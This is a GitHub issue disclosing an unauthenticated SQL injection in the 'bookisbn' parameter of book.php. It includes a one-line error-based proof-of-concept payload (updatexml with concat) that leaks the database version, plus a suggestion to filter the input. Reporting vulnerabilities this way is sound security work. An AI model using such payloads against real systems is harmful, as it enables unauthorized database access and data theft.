Skip to content

there is a sql injection vulnerability in book.php parameter "bookisbn" #11

Open
@liao10086

Description

@liao10086

version:1.0
No login required.
POC:

http://127.0.0.1:8888/book.php?bookisbn=1' or updatexml(1,concat(0x7e,(version())),0) -- a

1
View source code book.php
1
suggest:Please filter input of parameter "bookisbn"
author:zionlab@dbappsecurity.com.cn

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions